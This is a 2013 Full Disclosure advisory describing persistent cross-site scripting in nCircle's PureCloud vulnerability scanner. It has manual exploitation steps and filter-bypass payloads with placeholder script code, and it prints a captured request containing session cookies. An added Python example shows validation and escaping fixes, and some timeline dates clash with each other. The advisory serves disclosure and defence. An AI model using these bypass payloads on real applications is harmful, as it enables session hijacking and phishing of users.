Full Disclosure
mailing list archives
nCircle PureCloud Vulnerability Scanner - Multiple Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab com>
Date: Tue, 29 Jan 2013 11:20:15 +0100
Title:
======
nCircle PureCloud Vulnerability Scanner - Multiple Vulnerabilities
Date:
=====
2013-01-28
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=795
nCircle Tracking ID: 20130117-US11337
VL-ID:
=====
795
Common Vulnerability Scoring System:
====================================
4.1
Introduction:
=============
nCircle PureCloud is brought to you by nCircle, the leading provider of information risk and security performance management solutions.
PureCloud delivers an enterprise-class vulnerability scanner with more than double the coverage of other providers, covering thousands of conditions and prioritized risk assessments – all in a cloud-based solution.
nCircle PureCloud is the world's first security scanning technology that requires no scanning infrastructure on the customer network. PureCloud eliminates the need for firewall changes and software or hardware deployment on a customer's internal network. Requiring only a Web browser, PureCloud securely scans a private network to identify a broad range of vulnerabilities and risks, and provides detailed guidance on the steps necessary to reduce or eliminate those risks. With PureCloud, small businesses and home offices benefit from nCircle's most advanced enterprise class security scanning solution, without the complexity or maintenance associated with traditional SaaS or on-premise scanning products. PureCloud is delivered as a software service in the Cloud, making it cost-effective, efficient and widely accessible.
(Copy of the Vendor Homepage: https://purecloud.ncircle.com/about_purecloud/ )
Abstract:
=========
The Vulnerability-Laboratory Research Team discovered a web vulnerability in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application.
Report-Timeline:
================
2012-12-24: Researcher Notification & Coordination
2012-12-25: Vendor Notification
2012-01-16: Vendor Response/Feedback
2012-01-28: Vendor Fix/Patch by nCircle Dev
2012-01-28: Public Disclosure
Status:
========
Published
Affected Products:
==================
nCircle
Product: PureCloud - Vulnerability Scanner (cloud-based) 2012 Q4
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
A persistent, client-side POST injection web vulnerability has been detected in the nCircle PureCloud (cloud-based) Vulnerability Scanner application.
This vulnerability type allows an attacker to inject their own malicious script code into the vulnerable module on the application side (persistent).
1.1
The first vulnerability is located in the Scan Now > Scan Type > Perimeter Scan > Scan section when a request is processed via the `Scan Specific Devices - [Add Devices]` module and the bound vulnerable formErrorContent exception-handling application parameters.
The persistently injected script code is executed from the `invalid networks` exception-handling output of the web application. To bypass the application's standard validation filter, the attacker needs to provoke the specific `invalid networks` exception-handling error.
In the second step, the attacker splits the request after the invalid-filter context so that the unparsed malicious script code is executed after it.
The vulnerability can be exploited on the client side via a forced, manipulated link as a malicious request with medium user interaction, and also on the server side via a POST injection in the later-affected add-server listing module.
1.2
The second vulnerability is bound to the first issue and is located in the IP & Name output listing of the scan index after a network/server/IP has been added. The code is executed from the main IP & name listing after a malicious injection via the add module. To bypass the IP restriction filter, it is required to split the request, as in the first issue, with a valid IP. The remote attacker includes a valid ip+split(%20)`+own_scriptcode to pass through the system validation filter and execute the script code from the device name and IP listing.
The vulnerability can be exploited with a privileged application user account and low or medium required user interaction.
Successful exploitation of the vulnerability results in persistent/non-persistent session hijacking, persistent/non-persistent phishing, external redirects, external malware loads and persistent/non-persistent manipulation of the vulnerable module context.
Vulnerable Service(s):
[+] nCircle PureCloud (cloud-based) Vulnerability Scanner
[https://purecloud.ncircle.com/index/]
Vulnerable Section(s):
[+] Scan Now > Scan Type > Perimeter Scan > Scan
Vulnerable Module(s):
[+] Scan Specific Devices - [Add Devices]
[+] Scan IP (Index)
Vulnerable Parameter(s):
[+] formErrorContent
[+] ip & name
Affected Module(s):
[+] Exception Handling - Invalid Network(s)
[+] Scan Index - Listing
Proof of Concept:
=================
The client- and server-side web vulnerability can be exploited by remote attackers and local privileged application user accounts with low or medium user interaction. For demonstration or reproduction ...
1.1
Note:
When you try to inject a standard iframe, img src, script or onload, the context will be parsed by the exception handling to prevent the first execution after the injection attempt. To bypass the validation, first inject a frame which matches the invalid exception filter so that the error is displayed. Then split the request with %20 and inject the code after the split via POST.
Manual Exploitation:
1. Register an account at nCircle PureCloud to get access to the (cloud-based) Vulnerability Scanner
[https://purecloud.ncircle.com/registerinfo3/?hacknewssocial]
2. Log in to your account, switch to the Scan Now menu and open the Scan Type page
3. Choose the Perimeter Scan, not the local one!
4. Include a standard script alert tag to provoke the exception handling, split the request with %20' and inject your own frame onload script code. Save via Add!
5. The script code will be executed from the exception-handling invalid networks message.
6. Done #1 ... Successfully reproduced! Press Continue to exploit the listing as well :)
7. Include a valid IP, split the request (bypassing the input restriction) and inject your own script code after it.
8. Watch the scan index. The code will be executed from the vulnerable name and IP value output listing.
9. Done #2 ... Successfully reproduced!
PoC:
#1 <iframe src=PROVOKEINVALIDEXCEPTION1> %20' >"<[OWN INJECTED PERSISTENT SCRIPT CODE!]>
#2 <script>alert("PROVOKEINVALIDEXCEPTION2")</script> < %20' "><[OWN INJECTED PERSISTENT SCRIPT CODE!]) <
Review: Scan Specific Devices > [Add Devices] - Exception Handling - Invalid Network(s)
<div style="opacity: 0.87; position: absolute; top: 287px; left: 461px; margin-top: -200px;"
class="id_add_hosts_textformError parentFormscan-form formError">
<div class="formErrorContent">
The following networks are invalid: %20"><"><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT
INJECTED SCRIPT CODE!]>
(host not found)</iframe></div><div class="formErrorArrow"><div class="line10"><!-- --></div><div class="line9"><!--
--></div>
<div class="line8"><!-- --></div><div class="line7"><!-- --></div><div class="line6"><!-- --></div><div
class="line5"><!-- --></div>
<div class="line4"><!-- --></div><div class="line3"><!-- --></div><div class="line2"><!-- --></div><div
class="line1"><!-- --></div></div></div>
<input value="%20"><iframe src=[PROVOKE!]>%20 >"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]>"
id="id_add_hosts_text" tabindex="5" class="wizardInput" placeholder="Add Devices" type="text">
<button id="add_button" class="addButton">Add</button>
</div>
--- Manipulated POST Values ---
csrfmiddlewaretoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N
json_data={"connector":-1,"scan_connected_network":false,
"registration_id":"","scope_name":"","editing_scope_schedule":false,
"webapp":false,"targets":["><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT
CODE!]) <"]}
--- Manipulated POST Request ---
Status: 200[OK]
POST https://purecloud.ncircle.com/services/validate_targets/
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[181] Mime Type[application/json]
Request Header:
Host[purecloud.ncircle.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://purecloud.ncircle.com/index/]
Content-Length[439]
Cookie[csrftoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N;
sessionid=8c8624ba5e31c63bf24bcbf9af796743;
BIGipServerPICO-443to80=1875711404.20480.0000; utmcct=/ben37.root; wcsid=uNTCNCc0tpp1NCv01YCYlGfr93631472;
hblid=kRw3BvqhoczGhyJc8E8J5dYW93631472;
_oklv=1356379996583%2CuNTCNCc0tpp1NCv01YCYlGfr93631472;
olfsk=olfsk02835150931791619;
_okbk=cd5%3Davailable%2Ccd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1356378355284%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8
%3Dchat%2Ccd6%3D0%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9363-144-10-3734; __unam=97cb67-13bce735458-18f208d4-21;
_mkto_trk=id:671-RXE-353&token:_mch-ncircle.com-1356378363952-41877]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
csrfmiddlewaretoken[HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N]
json_data[%7B%22connector%22%3A-1%2C%22scan_connected_network%22%3Afalse%2C%22registration_id%22%3A%22%22%2C%22scope_name
%22%3A%22%22%2C%22editing_scope_schedule%22%3Afalse%2C%22webapp%22%3Afalse%2C%22targets%22%3A%5B%22%2520%5C%22+%2520+%5C%22%3E%3C
iframe+src%3Da+onload%3Dalert(%5C%22PROVOKEEXCEPtION%5C%22)+%3C++%5C%22%3E%3C[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT
CODE!])+%3C%22%5D%7D]
Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]
1.2
The server-side (persistent) web vulnerability can be exploited by remote attackers and local privileged application user accounts with low user interaction. For demonstration or reproduction ...
PoC:
[VALID IP]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
Solution:
=========
Parse the exception-handling error output listing and disallow error echoes that contain the requested web context.
To fix the vulnerability, parse the context of the input fields in the Add Devices module and restrict the input fields with a secure filter mask.
Also parse the name & IP scan index output listing and restrict the input of the requested web context in the scan listing.
2012-01-28: Vendor Fix/Patch by nCircle Dev
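The following is an added example (not Vulnerability Lab's code and not nCircle's fix) of the two mitigations this Solution section asks for, and it also addresses the "valid ip + split (%20) + script code" bypass described in Details 1.2: every requested target is validated as a whole string (IP address, CIDR network or RFC 1123 hostname), so a valid prefix followed by a space and markup is rejected outright, and anything echoed back into the invalid-networks error message or the name/IP scan listing is HTML-escaped at output time. The function names, the hostname regex and the sample target list are constructed for this illustration and are not part of the PureCloud application.

```python
import html
import ipaddress
import re
from typing import Dict, List

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen. Whitespace, quotes and angle
# brackets never match, so the whole string is accepted or rejected as one.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Constructed sample input for the demonstration (not captured from the product).
SAMPLE_TARGETS = [
    "192.0.2.10",
    "192.0.2.0/24",
    "scanner.example",
    "192.0.2.10 '><script>alert(1)</script>",  # valid prefix + split + markup
    "<iframe src=x>",                            # plain markup
]


def is_valid_target(target: str) -> bool:
    """True only if the complete string is an IP address, a CIDR network
    or a syntactically valid hostname; any surrounding whitespace fails."""
    if not target or target != target.strip():
        return False
    try:
        # Accepts "192.0.2.10" (as a /32) as well as "192.0.2.0/24".
        ipaddress.ip_network(target, strict=False)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(target))


def validate_targets(targets: List[str]) -> Dict[str, object]:
    """Split requested targets into accepted ones and an HTML-safe error
    message naming the rejected ones (the 'invalid networks' echo)."""
    accepted = [t for t in targets if is_valid_target(t)]
    rejected = [t for t in targets if not is_valid_target(t)]
    error_html = ""
    if rejected:
        # Rejected strings are attacker-controlled: escape them before they
        # are placed into the formErrorContent block so they render as text.
        error_html = "The following networks are invalid: " + ", ".join(
            html.escape(r, quote=True) for r in rejected
        )
    return {"accepted": accepted, "rejected": rejected, "error_html": error_html}


def render_listing_row(name: str, ip: str) -> str:
    """Render one scan-index row; name and IP are escaped at output time,
    so even a stored value containing markup cannot execute in the listing."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(name, quote=True), html.escape(ip, quote=True)
    )


if __name__ == "__main__":
    result = validate_targets(SAMPLE_TARGETS)
    print("accepted:", result["accepted"])
    print("error:", result["error_html"])
    print(render_listing_row("host '><svg onload=x>", "192.0.2.10"))
```

Validation and escaping are deliberately separate layers: the whole-string check keeps markup out of the stored device list in the first place, and output-time escaping protects the error message and the listing even if a value reaches them through another path.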
Risk:
=====
1.1
The security risk of the client- and server-side POST injection web vulnerability in the exception handling and listing is estimated as medium(+).
1.2
The security risk of the persistent input validation vulnerability in the scan index listing is estimated as medium(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () vulnerability-lab com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin () vulnerability-lab com - support () vulnerability-lab com - research () vulnerability-lab com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or support () vulnerability-lab com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research () vulnerability-lab com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/